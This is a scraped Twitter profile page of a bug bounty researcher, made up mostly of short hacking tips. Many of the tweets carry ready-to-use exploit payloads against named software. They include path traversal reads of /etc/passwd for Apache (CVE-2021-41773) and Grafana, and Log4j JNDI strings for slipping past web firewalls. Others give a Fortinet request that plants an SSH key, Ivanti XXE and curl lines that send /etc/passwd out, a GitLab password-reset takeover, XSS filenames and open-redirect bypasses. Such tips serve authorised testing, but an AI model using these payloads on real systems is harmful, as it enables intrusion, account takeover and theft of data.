H4x0r.DZ🇩🇿
@h4x0r_dz
Followers
50,349
Following
1,643
Media
1,360
Statuses
9,559
Explore trending content on Musk Viewer
México
• 1326658 Tweets
Morena
• 767833 Tweets
casillas
• 471596 Tweets
Xóchitl
• 416357 Tweets
CDMX
• 342428 Tweets
The Loyal Pin is Coming
• 322584 Tweets
PREP
• 258252 Tweets
緊急地震速報
• 209831 Tweets
AMLO
• 181851 Tweets
El INE
• 139735 Tweets
PRIAN
• 112556 Tweets
Maynez
• 92221 Tweets
Televisa
• 81118 Tweets
#BILLKINBAGUCCI
• 80010 Tweets
Oilers
• 59585 Tweets
$GME
• 53379 Tweets
Natalie
• 30049 Tweets
Edmonton
• 27238 Tweets
Otros 6
• 24751 Tweets
Bucaramanga
• 22716 Tweets
Kaveh
• 22062 Tweets
McDavid
• 16742 Tweets
Tommie
• 13113 Tweets
SmangatPRABOWO UntukNKRI
• 13056 Tweets
KitaKOMPAK KitaKOKOH
• 12258 Tweets
kcon
• 11763 Tweets
グッズ・ボイス販売
• 11394 Tweets
Pinned Tweet
My new writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
113
533
2K
CVE-2021-41773 POC
127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
28
619
2K
If you Are Interested In Developing your Hacking skills
Read some amazing
@BlackHatEvents
pdf <3.
Demo Google dork: site: intext:"RCE" filetype:pdf
#CyberSecurity
#BugBounty
#infosec
16
484
1K
Log4j Cloudflare bypass :
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/
other WAF :
11
445
1K
Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
59
298
1K
Grafana Exploit POC
$HOST/public/plugins/graph/../../../../../../../../etc/passwd
14
420
1K
CVE-2022-40684
ffuf -w "host_list.txt:URL" -u "
https://URL/api/v2/cmdb/system/admin/admin"
-X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r
30
366
1K
Find Leaked Credentials Using Google Chrome dev Tools (The Best Way 😎)
#bugbountytips
#bugbounty
#infosec
12
261
1K
when you are looking for bugs like SSRF & Open Redirect.
and there is a blacklisted character.
try to bypassed using other Unicode characters.
I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82".
poc: redirect_to=////evil%E3%80%82com
#BugBounty
#bugbountytip
9
276
917
In this tweet, I will explain to you How to find Leaking AWS Keys.
19
335
801
always when you found API endpoint like "/api/v4/anything" add "internal" to the route and you will be surprised 😃 for example :
/api/v4/users/<userid> =>> 403
/api/v4/internal/users/<userid> =>> 200
#bugbountytips
10
255
783
#BugBounty
If you find a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
6
255
727
Backup Files (does not exist on any Fuzzing wordlist ! )
hostname*com/hostname.rar , .sql.tar & .tar.gz & .tar.bzip2 & .tar & .sql.bz2 & .7z & .tar.bz2 & .sql.7z ....etc
already found so many WordPress websites backups
#bugbountytips
15
177
657
I don't want to live in The matrix anymore
This is the real Life :
39
21
655
How to Get Unique Subdomains on Large scope ???
I hope you like it .
5
193
620
many APIs are vulnerable to "JSON Patch" where you have access to the op, you can add, remove, replace, move, copy
example :
{ "op": "replace", "path": "/role", "value": "admin" },
more info :
#BugBounty
#bugbountytips
7
159
624
I moved From bug bounty to ctf
And I can confirm CTF is the real hacking,
A bug bounty is just an easy game compared to ctf
bug bounty : vulnerability assessment
CTF : real hacking
74
44
607
GET /api/users/1337 => 401
GET /api/users/
x-user-id: 1337
=>> 200 Ok
POST /api/users/<myID>/password-reset
x-user-id: <victimID>
full account takeover :) .
#bugbountytips
8
196
604
A simple way helped me to find more endpoints/info about
#bugbounty
target. maybe can help you!
site: "target"
site: "target"
#PenTest
#bugbountytip
#OSINT
#infosec
9
202
605
Some Devs use "Google Groups" as a workplace because it is easy and free.
But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc .
Dork: site: "$COMPANY"
I already found a lot of leaked critical data
#bugbountytips
20
181
603
CVE-2024-22024, XXE on Ivanti Connect Secure
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "
http://{{external-host}}/x">
%xxe;]><r></r>
send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#bugbountytips
#cve
#Ivanti
3
140
598
People Who Doing Bug Bounty For Red Bull please stop.
You Are Destroying The Field
Don't Do Bug Bounty For Free & Drink & T-shirts ...etc
When Companies Find Stupid Hackers Like You Who Work For Free, Many Other Companies Will Join The Club.
please stop
#BugBounty
33
97
581
I have a friend who joins
#bugbounty
Because of me. He didn't have good internet and no PC. just using his phone.
He found 5 bugs using his phone with the worst internet in the world (Algeria).
I really feel proud of this boy <3 .
31
58
584
Unknown recon Method via
waybackurls $TARGET.app.box.com
or just use google DORK :
site: "$TARGET"
Sometimes the employees upload sensitive files to the public on .
#bugbountytips
#bugbounty
6
204
556
Yay, I was awarded a $20,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
admin panel pwn > file upload > Arbitrary File Overwrite
tip: read js files well!
42
41
548
what an incredible auth bypass!
/foo?jsp=/authenticated-endpoint;.jsp
CVE-2024-27198 TeamCity authentication bypass
8
129
555
Holy shit, CVE-2024-4367
PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF
#infosec
8
113
551
My Goal for the 2023 is to quit bug bounty | cybersecurity and other computer stuff and buy a farm and 10 cows 🐄 and 100 chickens and 1337 sheep .
I'm still looking for the happiness ✍️
49
29
524
I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets!
Very Very useful on Large targets
#BugBounty
#bugbountytips
#infosec
14
111
532
Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE
POC
#BugBounty
#vulnerabilities
#rce
13
83
511
Scanning APK file for URIs, endpoints & secrets Using APKLeaks by
@dwisiswant0
1.install APKLeaksby
2. Download the APK file.
3. python3 -f app.apk
Easy win <3.
#bugbountytips
#BugsBunny
#infosec
7
202
495
Thousands of US companies have been hacked by Chinese hackers using This RCE.
Microsoft Exchange Server Remote Code Execution CVE-2021-26855 Exploit.
#BugBounty
#RCE
#infosec
14
193
495
#bugbountytips
There is a lot of web apps vulnerable to this issue
Ok, here is another
#bugbountytip
You can find this issue with “login with Google ” too, or any other Idp providers
During the signup process, delete the email value from the scope 💣
4
31
190
16
87
499
CVE-2024-21893 Ivanti Connect Secure SSRF to CVE-2024-21887 RCE
http://127.0.0.1:8090/api/v1/license/keys-status/;curl
-X POST -d @/etc/passwd ;
9
110
498
Automation Time-based Blind SQL injection on HTTP Headers Using Blisqy tool by
@JohnTroony
.
#BugBounty
#bugbountytip
7
216
481
Unfortunately, this was submitted previously by another researcher, but we appreciate your work and look forward to additional reports from you.
37
58
476
Default Credentials Cheat Sheet
4
152
458
I'm curious why
@ECCOUNCIL
offers such expensive certifications when they seem ineffective in cybersecurity. I'm currently taking the CEH course, and the browser-based lab keeps crashing. The PDF is over 2000 pages, with much of the content appearing to be copied from Google
33
59
457
GitLab CE/EE Account Takeover via Password Reset without user interactions CVE-2023-7028
Poc: in the rest password endpoint
user[email][]=valid
@email
.com&user[email][]=attacker
@email
.com
#bugbountytip
6
89
445
How to use FFUF over multiple hosts
$ for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done
#bugbountytips
#BugBounty
#ffuf
18
158
438
I'm happy to share that I got OSCP Certificate for the first attempt.
Thanks
@offsectraining
for the training
#CyberSecurity
#oscp
56
5
421
9
101
411
I just found Open Redirection on public
#bugbounty
program.
I tried all Open Redirect payload {that I know}, and nothing work, only one payload: redirect_to=//evil.com\
@whiteliste
.com
I hope this will help you :).
#bugbountytip
7
114
409
infinite money printing bug on Coinbase. awarded $250k to the hacker
POC :
14
93
410
technique to bypass 2FA I did not saw it In any place.
please tell me If it's public.
steps :
1. enable 2FA In your account
2. login and send the 2FA code to your email & SMS.
3. Wait until the code 2FA expires (it's Depends ..)
4.put any code.
5. b00M!
#bugbountytips
20
136
391
Is it possible to get a job in cybersecurity without certifications ?
#bugbountytips
#infosec
#cybersecurity
118
37
398
403 ??
Try This:
.git/branches/
.git/COMMIT_EDITMSG
.git/config
.git/description
.git/FETCH_HEAD
.git/HEAD
.git/hooks/
.git/index
.git/info/
.git/info/exclude
.git/logs/
.git/logs/HEAD
.git/logs/refs
.git/logs/refs/heads
.git/logs/refs/heads/master
[1]
2
162
392
20,000 person follow me , I don't know why there is so many people follow this useless guy.
I don't deserve all these followers at all, but thanks everyone
37
12
372
CVE-2024-27130, an unauthenticated stack overflow bug, which allows remote-code execution on qnap
credit
@watchtowrcyber
Yes Yes it is Friday , the perfect day to drop the 0day
0
66
372
CVE-2022-26134 Confluence RCE exploit automation :
httpx -l list.txt -paths path.txt -match-string "gid="
5
106
354
CVE-2024-34351 : Server-Side Request Forgery on Next.js
POC:
POST /x HTTP/2
Host: attacker*com
Content-Length: 2
Next-Action: xxxx
{}
#BugBounty
#bugbountytips
3
65
359
Yay, I was awarded a $5,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
out-of-bounds write in Fortinet CVE-2024-21762 👀
20
12
352
If The target is running the Postgres SQL server put the Unicode char "\u0000"
and see the magic 😄
note: this can break the database
9
45
348
Do not forget to Try login with This Credential In your
#bugbounty
Target :
Email: demo@<company>.com & test<company>.com
Password: demo@<company>.com , 123456789,123456,root, ..other default passwords .
You will log in to The Company as an Admin If you are lucky.
#bugbountytip
8
110
326
I feel I'm Super Hacker This Morning !
To download java from you need to create account
And the steps are so boring so I bypassed the login step 😂
35
27
328
trick to find hidden endpoints on web apps, start with Underscore (_)
ffuf -w wordlist.txt -u
#bugbountytip
#BugBounty
4
65
325
20 Content spoofing and 80 Clickjacking in one day
Expecting 215478$ USD
Payload used :-
<҉<҉<҉<҉<҉>҉>҉>҉>҉<҉<҉>҉<҉
#bugbountytips
38
43
316
someone is fasting and wrote <javascript> instead <script> 😂😂😂😂😂
I spent 20 mint figuring out why my code is not working 😂😂😂😂
#javascript
#RamadanMubarak
26
24
305
sometimes you can takeover the subdomain
sometimes you can takeover the entire domain lol
#BugBounty
16
11
309
Instagram fixed my 2fa bypass and closes my report informative and they said the bug not working! and I still have a video where I recorded the POC .
any suggestions guys?
#BugBounty
33
33
301
CVE-2024-4040 Authentication Bypass && Arbitrary File Read in CrushFTP
2
64
302
🎉 Excited to announce I’ve earned my CRTP (Certified Red Team Professional) certificate!
#redream
#CyberSecurity
30
4
297
Thank you bug bounty !
15
10
281
if you found apollo-server exposed on /api/graphql , you can manipulate the embedded page via endpoint URL parm , and inject your own host to receive the graphql query (steal users' information ..etc )
#bugbounty
#bugbountytips
5
55
289
